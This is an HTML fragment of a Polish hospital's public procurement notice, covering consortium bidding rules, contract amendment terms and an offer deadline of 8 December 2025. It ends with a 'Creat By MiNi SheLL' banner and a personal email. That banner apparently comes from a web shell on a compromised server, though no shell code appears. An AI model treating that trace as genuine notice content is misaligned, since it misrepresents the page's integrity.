class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacje dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia;<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego;<br/>3) Zamawiający nie wymaga od Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej<br/>formy prawnej w celu złożenia oferty w postępowaniu;<br/>4) w odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający nie określa wymagań<br/>związanych z realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych Wykonawców;<br/>5) przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>6) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia kluczowych zadań / części zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W projekcie umowy, który jest załącznikiem nr 4 do SWZ - uwzględnione zmiany <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa dostępnej pod adresem: https://szpitalgrochowski.ezamawiajacy.pl .</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2026-01-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com